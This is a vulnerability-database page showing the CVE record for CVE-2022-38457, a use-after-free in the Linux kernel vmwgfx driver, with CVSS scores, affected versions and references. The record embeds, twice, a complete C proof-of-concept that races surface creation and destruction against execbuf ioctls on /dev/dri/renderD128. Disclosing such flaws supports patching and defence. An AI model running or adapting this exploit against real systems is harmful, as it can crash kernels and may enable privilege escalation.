CVE-2022-38457
Vulnerability from cvelistv5
Published
2022-09-09 14:39
Modified
2024-09-17 02:11
Summary
There is an UAF vulnerability in vmwgfx driver
References
Impacted products
Linuxkernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T10:54:03.666Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.13.0-52*",
              "status": "affected",
              "version": "v4.20-rc1",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
        }
      ],
      "datePublic": "2022-09-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_cmd_res_check\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int handle,int sid){   \nint cmd[0x1000]={0};\ncmd[0]=1044;\ncmd[1]=0x50;\ncmd[2]=handle;\ncmd[3]=0;\ncmd[5]=sid;\ncmd[6]=0;\ncmd[7]=0;\ncmd[13]=1;\ncmd[12]=0;\ncmd[14]=1;\ncmd[19]=12;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=1;  \n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"poc failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"alloc_bo failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"create_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\n\nvoid destory_surface(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x4008644A, \u0026arg) == -1)\n                {\n                        printf(\"destory_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }       \n}\nvoid thread1(){\nwhile(1){\nsid = create_surface(); \ndestory_surface(sid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(handle,sid);  \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n    \n\ninit();\nhandle=alloc_bo();\n        if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n                perror(\"thread_create\");\n        }\n\n\t\n              if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n                perror(\"thread_create\");\n        }\n        \n        while(1){\n        sleep(3);\n        \n        }\n}"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-09-09T14:39:51",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
        }
      ],
      "source": {
        "defect": [
          "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
        ],
        "discovery": "INTERNAL"
      },
      "title": "There is an UAF vulnerability in vmwgfx driver",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "AKA": "Anolis",
          "ASSIGNER": "security@openanolis.org",
          "DATE_PUBLIC": "2022-09-06T07:00:00.000Z",
          "ID": "CVE-2022-38457",
          "STATE": "PUBLIC",
          "TITLE": "There is an UAF vulnerability in vmwgfx driver"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003e=",
                            "version_name": "5.13.0-52",
                            "version_value": "v4.20-rc1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_cmd_res_check\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
            }
          ]
        },
        "exploit": [
          {
            "lang": "en",
            "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int handle,int sid){   \nint cmd[0x1000]={0};\ncmd[0]=1044;\ncmd[1]=0x50;\ncmd[2]=handle;\ncmd[3]=0;\ncmd[5]=sid;\ncmd[6]=0;\ncmd[7]=0;\ncmd[13]=1;\ncmd[12]=0;\ncmd[14]=1;\ncmd[19]=12;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=1;  \n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"poc failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"alloc_bo failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"create_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\n\nvoid destory_surface(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x4008644A, \u0026arg) == -1)\n                {\n                        printf(\"destory_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }       \n}\nvoid thread1(){\nwhile(1){\nsid = create_surface(); \ndestory_surface(sid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(handle,sid);  \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n    \n\ninit();\nhandle=alloc_bo();\n        if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n                perror(\"thread_create\");\n        }\n\n\t\n              if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n                perror(\"thread_create\");\n        }\n        \n        while(1){\n        sleep(3);\n        \n        }\n}"
          }
        ],
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-416 Use After Free"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074",
              "refsource": "MISC",
              "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
            }
          ]
        },
        "source": {
          "defect": [
            "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
          ],
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2022-38457",
    "datePublished": "2022-09-09T14:39:51.323409Z",
    "dateReserved": "2022-09-07T00:00:00",
    "dateUpdated": "2024-09-17T02:11:30.468Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2022-38457\",\"sourceIdentifier\":\"security@openanolis.org\",\"published\":\"2022-09-09T15:15:14.520\",\"lastModified\":\"2023-04-17T16:45:05.667\",\"vulnStatus\":\"Analyzed\",\"descriptions\":[{\"lang\":\"en\",\"value\":\"A use-after-free(UAF) vulnerability was found in function \u0027vmw_cmd_res_check\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).\"},{\"lang\":\"es\",\"value\":\"Se ha encontrado una vulnerabilidad de uso de memoria previamente liberada (UAF) en la funci\u00f3n \\\"vmw_cmd_res_check\\\" en el archivo drivers/gpu/vmxgfx/vmxgfx_execbuf.c en el controlador vmwgfx del kernel de Linux con el archivo de dispositivo \\\"/dev/dri/renderD128 (o Dxxx)\\\". Este fallo permite a un atacante local con una cuenta de usuario en el sistema conseguir privilegios, causando una denegaci\u00f3n de servicio (DoS)\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\",\"baseScore\":5.5,\"baseSeverity\":\"MEDIUM\"},\"exploitabilityScore\":1.8,\"impactScore\":3.6},{\"source\":\"security@openanolis.org\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\",\"baseScore\":6.3,\"baseSeverity\":\"MEDIUM\"},\"exploitabilityScore\":2.1,\"impactScore\":4.2}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-416\"}]},{\"source\":\"security@openanolis.org\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-416\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"4.20\",\"versionEndExcluding\":\"6.1.7\",\"matchCriteriaId\":\"2D63FB2D-B092-4364-B732-F4FD54A43619\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.2:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"FF501633-2F44-4913-A8EE-B021929F49F6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.2:rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"2BDA597B-CAC1-4DF0-86F0-42E142C654E9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.2:rc3:*:*:*:*:*:*\",\"matchCriteriaId\":\"725C78C9-12CE-406F-ABE8-0813A01D66E8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.2:rc4:*:*:*:*:*:*\",\"matchCriteriaId\":\"A127C155-689C-4F67-B146-44A57F4BFD85\"}]}]}],\"references\":[{\"url\":\"https://bugzilla.openanolis.cn/show_bug.cgi?id=2074\",\"source\":\"security@openanolis.org\",\"tags\":[\"Issue Tracking\",\"Permissions Required\"]}]}}"
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading...

Loading...

Loading...

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.